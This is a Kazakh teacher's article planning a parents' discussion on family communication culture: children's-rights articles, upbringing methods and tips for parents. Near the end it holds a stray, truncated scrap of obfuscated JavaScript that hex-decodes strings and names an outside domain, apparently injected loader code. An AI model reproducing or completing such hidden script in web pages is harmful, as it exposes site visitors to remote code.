Отбасындағы қарым-қатынас мәдениеті

Өнегелі жанұя
Отбасындағы қарым-қатынас мәдениеті

Мақала авторы: Кайсина Ляйля Кулумхановна
Жұмыс орны: Ақсу қаласы №1 қазақ орат мектебі
Лауазымы: "өзін-өзі тану" пәнінің мұғалімі
Порталға жариялану мерзімі: 16.02.2016


Пікірталас.

Қатысушылар: Ата-аналар
Жауапты: Л.К.Кайсина

Отбасындағы қарым-қатынас мәдениеті.
Мақсаты: Отбасындағы қарым-қатынас мәдениетін сақтауға,отбасында бір-біріне деген сый-құрметтер дамытуға ықпал ету.
Міндеттері:
1. «Қарым-қатынас мәдениеті» ұғымының мәнін ашу.
2.Отбасындағы балалардың қарым-қатынас мәдениетінің ерекшеліктерін
анықтау, олардың қалыптасу жолдарын көрсету.
3.Балаларда қарым-қатынас мәдениетін қалыптастырудағы отбасының
мүмкіндіктерін айқындау.
4. Бала құқығымен таныстырып өту.
5.Отбасы тәрбиесі жағдайында әдіс- тәсілдерін ұсыну.
6. Әңгіме қазғау сұрақтарын талқылау.

Отбасы — адам баласының өсіп-өнер алтын ұясы. Адамның өміріндегі ең қуанышты, қызық дәурені осы отбасында өтеді. Бала өмірінің алғашқы күнінен бастап, ата-ана өздерінің негізгі борыштарын — тәрбие жұмысын атқаруға кіріседі.
Отбасы мүшелерінің өзара дұрыс қарым – қатынасын, тіл табысып түсінуін, бірін – бірі тыңдап, ата – ананы, туған туыстарын, жасы үлкендерді сыйлап, құрмет тұтуға үйрету. Оқытудың, білім алудың, мәдени мінез – құлықтың әдет – дағдыларын қалыптастыру. Отбасындағы баланың икемділігі мен қабілетін байқап, кәсіптік жағынан бағдарлау. Баланың ақылына, күшіне біліміне сай берілген тапсырманы талапты орындауға дайын болуға үйрету.
Ата-ананың ең ардақты міндеті: бала бойына жақсы қасиеттерді сіңіре беру,күн сайын емес,сағат сайын бала оқуын, еңбегін,ойынын,жолдастарымен қарым-қатынасын үнемі шаршамай, ерінбей бақылап,жақсылыққа жол сілтеу. Бала біздің болашағымыз,өміріміздің жалғасы,сондықтан бала тәрбиесі — ата-анадан жауапкершілікті талап етеді.
Бала тәрбиесінің негізі — бұл оның отбасы. Осы шағын әлеуметтік топ — бала үшін өмір мектебі. Отбасындағы ата-ана — баланың өмірлік ұстазы және тәрбиешісі. Баланың болашағы, білімі, мәдениеті отбасындағы ата-ананың сіңірген еңбегіне, тәлім-тәрбиесіне байланысты. Сондықтан, әрбір ата-ана өзінің баласын білімді, мәдениетті, жан-жақты етіп тәрбиелеуге міндетті. Қазіргі кезде отбасы тәрбиесі мәселесі әлемдік деңгейде қарастырылуда. Оған «Балалар құқығы туралы Конвенция» (1995
Қазіргі кезде ата-ананың бірінші мақсаты қаражат табу, балаларын еш нәрседен мұқтаж етпеу болып қалды.Көпшілік ата-анада тұрақты жұмыс жоқ.Бала -шағаның қамымен жүрген ата-ана олардың тәрбиесіне де көңіл бөле алмай қалды.Осыдан келіп баламен арада кейбір түсініспеушілік те болып қалады.Баланы тек қана киіндіріп, ішіндірумен ғана шектеліп қоймай,олардың тәрбиесіне де аса мән берулеріңіз қажет. Біздің мақсатымыз – балаларыңыз бен қарым-қатынастарыңызды бұрынғыдан да жақсартып,бала тәрбиесіне көп көңіл бөлудің маңыздылығын дәлелдеу.
«Бала тәрбиесі — мемлекеттің маңызды міндеті»деген сөзді ежелгі грек философы Платонның өзі де бекер айтпаған болар.
Қазіргі таңдағы әлеуметтік жағдай да оңай болып отырған жоқ. Кейбір тұрмыстық қиындықтардың кесірінен келеңсіз жағдайлар белең алуда. Сондықтан Елбасы Н.Ә.Назарбаев өзінің халыққа жолдауларында егемен еліміздің азаматтарын қалыптастыруда тәрбие жұмысының ерекше рөлі барын баса айтып келеді. Жас жеткіншектеріміздің тәрбиесінің негізі отбасында қалыптасады.Демек,баланың келешекте қандай адам болуы ең алдымен өзі туылған отбасында алған тәлім-тәрбиесіне,ондағы қарым-қатынасқа байланысты екені күмәнсіз.Әрбір ата-ана өз перзентінің әдепті,саналы,иманды да ибалы, Отанының сүйікті және кішіпейіл азаматы болып жетілуін қалайды.Олай болса,әрбір ата-ана бала тәрбиесінің нәзік тұстарын білуі шарт. «Жапырақ тамырдан нәр алады» дейді халқымыз. Барлық бала жақсы мен жаман әдеттерді өзі өскен шаңырақта үйренеді. Егер ата-ана,басқа да отбасы мүшелері өзара жақсы қарым-қатынаста болса,олардың балалары да әдепті,тәбиелі болып өседі. Сондықтан әрбір ата-ана бабаларымыздың әдеп-ғұрыптары мен дәстүрлерін ұлықтап,аңыз,ертегі немесе жұмбақ түрінде балалардың санасына сіңіре беруі тиіс. Яғни, олар сол арқылы балаларын еңбекке, жақсылыққа үндейді,адал болуға және Отанын сүюге шақырады.
Халқымыз «Балапан ұяда не көрсе,ұшқанда соны іледі»деп бекер айтпаған. Жақсы тәрбие баланың санасында мәңгі мөрленіп қалады. Ол кейін оның бүкіл өміріне азық болады.
«Балалар құқығы туралы Конвенция» (1995)
21-бап. Баланың отбасында өмiр сүру және тәрбиелену
құқығы
Баланың мүдделерiне қайшы келетiн жағдайларды қоспағанда, әрбiр баланың отбасында өмiр сүруге және тәрбиеленуге құқығы, өзiнiң ата-анасын бiлуге құқығы, олардың қамқорлығы мен тәрбиесiн алуға құқығы бар.
22-бап. Баланың отбасындағы құқықтары
Бала отбасында Қазақстан Республикасының Конституциясында , осы заңда және Қазақстан Республикасының өзге де заң актiлерiнде белгiленген құқықтарға ие.
23-бап. Бала тәрбиелеп отырған отбасыларына мемлекеттiк
қолдау
Мемлекет бала тәрбиелеп отырған отбасыларына Қазақстан Республикасының заңдарында белгiленген тәртiппен әлеуметтiк көмек беру арқылы қолдау көрсетедi.
24-бап. Ата-анасының баланы тәрбиелеу, күтiп-бағу және
асырау жөнiндегi мiндетi
1. Ата-анасы немесе басқа да заңды өкiлдерi өздерiнiң қабiлетi мен қаржы мүмкiндiктерi шегiнде баланың жан-жақты дамуы үшiн қажеттi жағдай жасауға мiндеттi.
2. Ата-анасы баланы тәрбиелеуге, оны күтiп-бағуды жүзеге асыруға, материалдық жағынан қолдап, оның әл-ауқатына қамқорлық жасауға, тұрғын үймен қамтамасыз етуге мiндеттi.
Отбасында қарым-қатынас мәдениетін қалыптастырудың әдіс-тәсілдері
ырым, тыйымдар аркылы тәрбиелеу;
ақыл-кеңес беру, түсіндіру,
сөйлеу мәдениетін қалыптастыру;
ұлы гұламалардың өсиет сөздерін пайдалану;
халық ертегілерін бірлесе оку;
мектеп, мұгалім, сынып оқушыларымен тыгыз байланыс жасау;
бірлескен қозғалыс ойындар ұйымдастыру;
ашық әңгіме-сұхбаттар;
ата-аналардың жеке үлгі-өнеге көрсетуі;
бірлесе өткізген демалыс уақыттары;
балалар көркем фильмдерін бірге талдау;
салауатты өмір салтын қалыптастыру;
Әңгімелесу сұрақтары:
1. Отбасындағы қарым-қатынас мәдениетін сақтау неге байланысты?
2. Отбасындағы тату тәтті өмір сүруге басты қасиеттер қандай болу керек?
3.“Қарым-қатынас мәдениетін” қалай құру керек?
4. Мұғалімдердің үлесі қаншалықты?
Ата-аналарға сауал
1.Бала тәрбиесіне отбасында кім көңіл бөледі? (әкесі немесе шешесі)
2.Балаңыздың бойында ерекше қасиеттері бар ма? Байқаған жағдайда қандай мүмкіндік жасадыңыз? (Биге бейім, ән айтқанды ұнатады т.б.)
Қорытынды:
Қазақстан Республикасы Ата Заңының 27 бап 2 тармағында «Балаларына қамқорлық жасау және оларды тәрбиелеу ата-ананың табиғи құқығы,әрі парызы»делінген. Балаға дұрыс бағыт беретін үлкен, мықты тәрбие ошағы болып саналатын -Отбасы.Себебі келешек әулеттің білікті азаматтары сонда тәрбиеленеді,адамның жеке басының бастапқы тәрбиесі пайда болады,мінездің негізі қаланады және адами қасиеттер мен әдептілік қалыптасады.Демек баланың келешекте қандай адам болуы өзі туылған отбасында алған тәлім-тәрбиесі,ондағы қарым-қатынасқа байланысты болмағы күмәнсіз.
Әрбір ата-ана өз перзентінің әдепті,саналы,иманды да ибалы,Отанының сүйікті және кішіпейіл азамат болып жетілуін қалайды.Олай болса, әрбір ата-ана өз отбасында балаларын тәрбиелеудің нәзік жақтарын, заңдылықтарын білуі шарт.
«Жапырақ тамырдан нәр алады» дейді халқымыз.Сол айтқандай бабалардың әдет-ғұрыптары мен дәстүрлерін,еңбек сүйгіштік қасиеттерді өзі өскен отбасынан алады.Яғни, олар балаларын еңбекке, жақсылыққа үндейді,адал болуға және Отанын сүюге шақырады.
«Балаға берілген бірінші тәрбие -ата-анасын,туған-туысын, жолдасын сыйлауға үйретуден басталады»дейді ұлы ағартушы Ыбырай Алтынсарин. «Адамға ең бірінші керегі білім емес, тәрбие.Тәрбиесіз берілген білім -адамзаттың қас жауы,ол келешекте оның өміріне апат әкеледі»- деп Әл-Фараби айтқандай, Егеменді елдің ертеңі сол ел ұрпағының білімі мектеп тәрбиесінің тереңдігімен өлшенеді. Мекткептің мақсты — біліми өрісі биік, дені сау, ұлттық сана сезімі оянған, рухани ойлау жүйесі жоғары, мәдениетті, парасатты, ар-ожданы мол, еңбекқор, іскер, бойында басқа да игі қасиеттері қалыптасқан сегіз қырлы — бір сырлы ұлтжанды ұрпақ тәрбиелеу.
Бала тәрбиесі бір күндік іс емес. Сондықтанда бала тәрбиесіне жете мән беріп, «Адамның бір қызығы — бала деген» ұлы аталарымыздың даналық сөзін естен шығармайық.
Ата-аналар «Сиқырлы қалам»арқылы тренигтен алған әсерлерін бір ауыз сөзбен жеткізеді.
Қыс өтіп , көктем келеді. Көктемде ақ жауын көп жауады.Жауын суы жерге сіңіп, жер ананы бусандырады.Сол сияқты сіздер де бүгінгі тренингтен алған әсерлеріңізді жүрек түкпіріне қалдыруларыңызды өтінемін.
Күніміз ашық болсын,
Түніміз тыныш болсын,
Ауамыз таза болсын,
Суымыз мөлдір болсын,
Ұл-қызымыз аман болсын!
Айына екі- үш рет
 Баланы үй шаруашылығын жүргізуді үйретіңіз.
 Бетпе- бет ,баламен жеке әңгімелесуге уақыт табыңыз
 Баланңыздың хобби болса, қолдаңыз.
 Балаға бірнеше тапсырмалар беріңіз,орнындаған соң мақтаңыз. (армандаған ойыншығын, керекті затын енбек арқылы ала алатын түсінсін)
 Отбасының фотоальбомын балалармен бірге жасаңыз, фотолардың қасына комментарийларды жазыңыздар Жұмасына бір рет

* Жанүяңызда балаңызда өзінің
міндеттері болу керек.
* Оқығанды, көргенді балаңызбен
бірге талқылау керек.
* Балаңызбен бірге ойн ойнауды
қарастырыңыз (лото, шашки ,
шахматы т.б.)

Күнде.
 Балаңызды құшақтауды,оны сүйюге ұмытпаңыз.
 Баланы мейірбандыққа, жомартылыққа үйретіңіз
 Балаңызға “Кешір мені”,”Рақмет”деуге ұялмаңыз.
 Телевизордың орнына, көбірек балаңызбен араласыңыз

Сіздің жанұяңыз нені іздеп табады?

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «adisteme.kzu.kz»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e

Конкурстар мен олимпиадалар - https://talimger.kz

Республикалық қашықтық олимпиадалар — http://clever.zti.kz

Республикалық конкурстар, курстар, конференциялар мен олимпиадалар — https://ukz.kz

Конкурстар, конференциялар және олимпиадалар — https://tarim.kz

Халықаралық семинарлар, олимпиадалар мен конкурстар — https://mriks.ru

Халықаралық педагогтар ассоциациясы - https://iae.su

Атаулы ертегілер - https://hansunqar.kz